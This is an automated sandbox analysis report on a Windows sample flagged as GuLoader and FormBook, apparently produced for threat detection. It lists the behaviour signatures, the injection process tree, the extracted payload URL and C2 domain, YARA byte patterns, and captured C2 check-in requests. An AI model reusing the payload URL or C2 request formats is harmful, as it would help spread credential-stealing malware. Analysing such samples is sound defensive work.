Windows Analysis Report 3sO4kwopMH.exe

Overview

General Information

Sample Name: 3sO4kwopMH.exe
Analysis ID: 1667
MD5: ab5135e71815ad27daf57be78754c85d
SHA1: 805c799582b9850f835d42c09ca1aeee35b2faf7
SHA256: 4df45d5c109f75ab624bef07b6d0ecc5f7c7fd2527efdd2af3b18e0c5d8b32ee

Detection

GuLoader FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Creates multiple autostart registry keys
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
Injects a PE file into a foreign process
Creates autostart registry keys with suspicious values (likely registry only malware)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious names
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Connects to many different domains
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Connects to several IPs in different countries
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64native
  • 3sO4kwopMH.exe (PID: 7912 cmdline: 'C:\Users\user\Desktop\3sO4kwopMH.exe' MD5: AB5135E71815AD27DAF57BE78754C85D)
    • 3sO4kwopMH.exe (PID: 2028 cmdline: 'C:\Users\user\Desktop\3sO4kwopMH.exe' MD5: AB5135E71815AD27DAF57BE78754C85D)
      • explorer.exe (PID: 4868 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • help.exe (PID: 1028 cmdline: C:\Windows\SysWOW64\help.exe MD5: DD40774E56D4C44B81F2DFA059285E75)
          • cmd.exe (PID: 9060 cmdline: /c del 'C:\Users\user\Desktop\3sO4kwopMH.exe' MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 9168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://45.137.22.91/bin_txbkK174.bin"}

Threatname: FormBook

{"C2 list": ["www.thesewhitevvalls.com/b2c0/"], "decoy": ["bjyxszd520.xyz", "hsvfingerprinting.com", "elliotpioneer.com", "bf396.com", "chinaopedia.com", "6233v.com", "shopeuphoricapparel.com", "loccssol.store", "truefictionpictures.com", "playstarexch.com", "peruviancoffee.store", "shobhajoshi.com", "philme.net", "avito-rules.com", "independencehomecenters.com", "atp-cayenne.com", "invetorsbank.com", "sasanos.com", "scentfreebnb.com", "catfuid.com", "sunshinefamilysupport.com", "madison-co-atty.net", "newhousebr.com", "newstodayupdate.com", "kamalaanjna.com", "itpronto.com", "hi-loentertainment.com", "sadpartyrentals.com", "vertuminy.com", "khomayphotocopy.club", "roleconstructora.com", "cottonhome.online", "starsspell.com", "bedrijfs-kledingshop.com", "aydeyahouse.com", "miaintervista.com", "taolemix.com", "lnagvv.space", "bjmobi.com", "collabkc.art", "onayli.net", "ecostainable.com", "vi88.info", "brightlifeprochoice.com", "taoluzhibo.info", "techgobble.com", "ideemimarlikinsaat.com", "andajzx.com", "shineshaft.website", "arroundworld.com", "reyuzed.com", "emilfaucets.com", "lumberjackguitarloops.com", "pearl-interior.com", "altitudebc.com", "cqjiubai.com", "kutahyaescortbayanlarim.xyz", "metalworkingadditives.online", "unasolucioendesa.com", "andrewfjohnston.com", "visionmark.net", "dxxlewis.com", "carts-amazon.com", "anadolu.academy"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000017.00000002.1219017078.00000000000A0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000017.00000002.1219017078.00000000000A0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
  • 0x16af8:$sqlite3text: 68 38 2A 90 C5
  • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000017.00000002.1219017078.00000000000A0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001F.00000002.5659773330.0000000003167000.00000004.00020000.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
  • 0x13078:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000001F.00000002.5641903832.0000000002600000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

      AV Detection:

Found malware configuration
Source: 00000017.00000002.1219017078.00000000000A0000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.thesewhitevvalls.com/b2c0/"], "decoy": ["bjyxszd520.xyz", "hsvfingerprinting.com", "elliotpioneer.com", "bf396.com", "chinaopedia.com", "6233v.com", "shopeuphoricapparel.com", "loccssol.store", "truefictionpictures.com", "playstarexch.com", "peruviancoffee.store", "shobhajoshi.com", "philme.net", "avito-rules.com", "independencehomecenters.com", "atp-cayenne.com", "invetorsbank.com", "sasanos.com", "scentfreebnb.com", "catfuid.com", "sunshinefamilysupport.com", "madison-co-atty.net", "newhousebr.com", "newstodayupdate.com", "kamalaanjna.com", "itpronto.com", "hi-loentertainment.com", "sadpartyrentals.com", "vertuminy.com", "khomayphotocopy.club", "roleconstructora.com", "cottonhome.online", "starsspell.com", "bedrijfs-kledingshop.com", "aydeyahouse.com", "miaintervista.com", "taolemix.com", "lnagvv.space", "bjmobi.com", "collabkc.art", "onayli.net", "ecostainable.com", "vi88.info", "brightlifeprochoice.com", "taoluzhibo.info", "techgobble.com", "ideemimarlikinsaat.com", "andajzx.com", "shineshaft.website", "arroundworld.com", "reyuzed.com", "emilfaucets.com", "lumberjackguitarloops.com", "pearl-interior.com", "altitudebc.com", "cqjiubai.com", "kutahyaescortbayanlarim.xyz", "metalworkingadditives.online", "unasolucioendesa.com", "andrewfjohnston.com", "visionmark.net", "dxxlewis.com", "carts-amazon.com", "anadolu.academy"]}
Source: 00000000.00000002.785872843.0000000002280000.00000040.00000001.sdmp, Malware Configuration Extractor: GuLoader {"Payload URL": "http://45.137.22.91/bin_txbkK174.bin"}
Multi AV Scanner detection for submitted file
Source: 3sO4kwopMH.exe, Virustotal: Detection: 43%
Source: 3sO4kwopMH.exe, Metadefender: Detection: 25%
Yara detected FormBook
Source: Yara match, File source: 00000017.00000002.1219017078.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001F.00000002.5641903832.0000000002600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000001C.00000000.1094543627.000000000EDCF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000002.1228957686.000000001E350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001F.00000002.5640420327.00000000023B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001C.00000000.1156599847.000000000EDCF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001F.00000002.5629824643.0000000000120000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.metalworkingadditives.online/b2c0/?6l=tQ9OUq/au2j7Ts3tmWTzZlmpGIW84sc0d5YJpv42KDMZxUSBkatd7Ys79Ddqwtu/lQ5M&FZ=o87TchT09DMdG270, Avira URL Cloud: Label: phishing
Source: http://www.metalworkingadditives.online/b2c0/, Avira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URL
Source: www.thesewhitevvalls.com, Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Forflyt4\BACC.exe, Metadefender: Detection: 25%
Source: C:\Users\user\AppData\Local\Temp\Ggddhhz98\vga4hmhzls.exe, Metadefender: Detection: 25%
Source: 31.2.help.exe.316796c.4.unpack, Avira: Label: TR/Dropper.Gen
Source: 31.2.help.exe.27c03d0.1.unpack, Avira: Label: TR/Dropper.Gen
Source: 3sO4kwopMH.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP, source: 3sO4kwopMH.exe, 00000017.00000002.1231484601.000000001E7DD000.00000040.00000001.sdmp, help.exe, 0000001F.00000002.5650535710.0000000002C10000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: 3sO4kwopMH.exe, help.exe
Source: Binary string: help.pdbGCTL, source: 3sO4kwopMH.exe, 00000017.00000002.1219247675.00000000000D0000.00000040.00020000.sdmp
Source: Binary string: help.pdb, source: 3sO4kwopMH.exe, 00000017.00000002.1219247675.00000000000D0000.00000040.00020000.sdmp
Source: C:\Windows\SysWOW64\help.exe, Code function: 31_2_0012FAA0 FindFirstFileW,FindNextFileW,FindClose, 31_2_0012FAA0
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 4x nop then mov edx, edx, 0_2_004022D0
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 5x nop then push edx, 0_2_004022D0
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 4x nop then mov edx, edx, 0_2_0040324D
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 5x nop then push edx, 0_2_0040324D
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 5x nop then push edx, 0_2_00403671
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 4x nop then mov edx, edx, 0_2_00403472
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 5x nop then push edx, 0_2_00403472
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 4x nop then mov edx, edx, 0_2_004032D9
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 5x nop then push edx, 0_2_004032D9
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 4x nop then mov edx, edx, 0_2_004022E8
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 5x nop then push edx, 0_2_004022E8
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 4x nop then mov edx, edx, 0_2_004034F2
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 5x nop then push edx, 0_2_004034F2
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 5x nop then push edx, 0_2_004036F6
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 4x nop then mov edx, edx, 0_2_00403369
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 5x nop then push edx, 0_2_00403369
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 5x nop then push edx, 0_2_0040377B
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 4x nop then mov edx, edx, 0_2_004031C2
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 5x nop then push edx, 0_2_004031C2
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 4x nop then mov edx, edx, 0_2_004033F2
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 5x nop then push edx, 0_2_004033F2
Source: C:\Users\user\Desktop\3sO4kwopMH.exe, Code function: 5x nop then push edx, 0_2_004035F4

      Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49759 -> 45.137.22.91:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49775 -> 141.136.33.194:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49775 -> 141.136.33.194:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49775 -> 141.136.33.194:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49777 -> 198.185.159.144:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49777 -> 198.185.159.144:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49777 -> 198.185.159.144:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49783 -> 208.91.197.27:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49783 -> 208.91.197.27:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49783 -> 208.91.197.27:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49784 -> 172.105.103.207:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49784 -> 172.105.103.207:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49784 -> 172.105.103.207:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49786 -> 91.195.240.94:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49786 -> 91.195.240.94:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49786 -> 91.195.240.94:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 209.17.116.163:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 209.17.116.163:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 209.17.116.163:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49793 -> 104.21.71.3:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49793 -> 104.21.71.3:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49793 -> 104.21.71.3:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 66.29.130.249:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 66.29.130.249:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 66.29.130.249:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49809 -> 198.185.159.144:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49809 -> 198.185.159.144:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49809 -> 198.185.159.144:80
Source: Traffic, Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49810 -> 45.137.22.91:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49812 -> 104.21.71.3:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49812 -> 104.21.71.3:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49812 -> 104.21.71.3:80
Source: Traffic, Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49814 -> 45.137.22.91:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 172.105.103.207:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 172.105.103.207:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 172.105.103.207:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 91.195.240.94:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 91.195.240.94:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 91.195.240.94:80
Source: Traffic, Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49819 -> 45.137.22.91:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49829 -> 209.17.116.163:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49829 -> 209.17.116.163:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49829 -> 209.17.116.163:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49831 -> 104.21.71.3:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49831 -> 104.21.71.3:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49831 -> 104.21.71.3:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49834 -> 66.29.130.249:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49834 -> 66.29.130.249:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49834 -> 66.29.130.249:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49839 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49839 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49839 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49843 -> 119.8.56.140:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49843 -> 119.8.56.140:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49843 -> 119.8.56.140:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 172.105.103.207:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 172.105.103.207:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 172.105.103.207:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49867 -> 91.195.240.94:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49867 -> 91.195.240.94:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49867 -> 91.195.240.94:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49875 -> 209.17.116.163:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49875 -> 209.17.116.163:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49875 -> 209.17.116.163:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49878 -> 104.21.71.3:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49878 -> 104.21.71.3:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49878 -> 104.21.71.3:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49881 -> 66.29.130.249:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49881 -> 66.29.130.249:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49881 -> 66.29.130.249:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49883 -> 172.67.186.156:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49883 -> 172.67.186.156:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49883 -> 172.67.186.156:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49888 -> 207.97.200.47:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49888 -> 207.97.200.47:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49888 -> 207.97.200.47:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49890 -> 185.33.94.234:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49890 -> 185.33.94.234:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49890 -> 185.33.94.234:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49897 -> 172.105.103.207:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49897 -> 172.105.103.207:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49897 -> 172.105.103.207:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49899 -> 91.195.240.94:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49899 -> 91.195.240.94:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49899 -> 91.195.240.94:80
System process connects to network (likely due to code injection or exploit)
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: http://45.137.22.91/bin_txbkK174.bin
Source: Malware configuration extractor, URLs: www.thesewhitevvalls.com/b2c0/
Source: Joe Sandbox View, ASN Name: DREAMHOST-ASUS DREAMHOST-ASUS
      Source: global trafficHTTP traffic detected: GET /b2c0/?FZ=o87TchT09DMdG270&6l=vygEhc5xglj1G3JS6VTWPJeN725RXGvf61z4/vCmH17Sx0DgX8UOPYydl02519zwEgP2 HTTP/1.1Host: www.sasanos.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?6l=9klYqUXfwNEUz5Dp7Qz99T7ztAaRSICJZSViThIkJR88b++KDK4249RTyX80jsCFKVry&a2M=u48tnv HTTP/1.1Host: www.reyuzed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?6l=ngE3zTEVEmcPQiuqUlJtRqVv6LVi69c0agGQYGihkwEIgq8iGc/2kBp4e7/X5hhhnzl7&a2M=u48tnv HTTP/1.1Host: www.newstodayupdate.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?6l=Evx8EsBDD995ptjzx7gJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDwZ5ennVPQW&a2M=u48tnv HTTP/1.1Host: www.lumberjackguitarloops.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?6l=t6gJF9Uqg2ICUXLQrZwsp6zjCr1F/wRH5aNJKMXGgDAfWhuPLw6f14vuC2QzFi5LkCNM&a2M=u48tnv HTTP/1.1Host: www.bf396.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?6l=TXWnycs6/xJ2/7UJodGMQUHmzvUS8Ow5bewKdkxBVVL02ReSU1pZ67Rw0pG+5oZumuDm&a2M=u48tnv HTTP/1.1Host: www.6233v.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?6l=7vDA584eYqgtbehCqdDIlmIIhk2204g4Pu7RqGaM+nQx/CVX9som8HxmUtOhVBsWsvuT&a2M=u48tnv HTTP/1.1Host: www.truefictionpictures.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?FZ=o87TchT09DMdG270&6l=Rsl6eVz5VGvHVfgxyoYLklwV2F0wFlRiIbasvGTIitkrxs2ugDluNYG7ptOS9cmQPTpc HTTP/1.1Host: www.thesewhitevvalls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?6l=6MB9xBzUNYGaB0HC2KSWe5N1d03fCSQj95knWB3UNGHVRW9fsCNX3pl6ckQ6rxP1ajrJ&FZ=o87TchT09DMdG270 HTTP/1.1Host: www.philme.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?FZ=o87TchT09DMdG270&6l=Nq7JSK++1Viv3o+cV3L9p1r/W1Jbb2TTrm4azGTrFosPABOSrSYj/6inrnIMRCxFDXmr HTTP/1.1Host: www.andajzx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?6l=TXWnycs6/xJ2/7UJodGMQUHmzvUS8Ow5bewKdkxBVVL02ReSU1pZ67Rw0pG+5oZumuDm&FZ=o87TchT09DMdG270 HTTP/1.1Host: www.6233v.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?FZ=o87TchT09DMdG270&6l=4PsiiC+AMIIWnU5haZInkKvtX1Dtzn2kXWjZT0AZvKfBpskKXc2pKK6jspJHb6hwGzWu HTTP/1.1Host: www.shopeuphoricapparel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?6l=tQ9OUq/au2j7Ts3tmWTzZlmpGIW84sc0d5YJpv42KDMZxUSBkatd7Ys79Ddqwtu/lQ5M&FZ=o87TchT09DMdG270 HTTP/1.1Host: www.metalworkingadditives.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
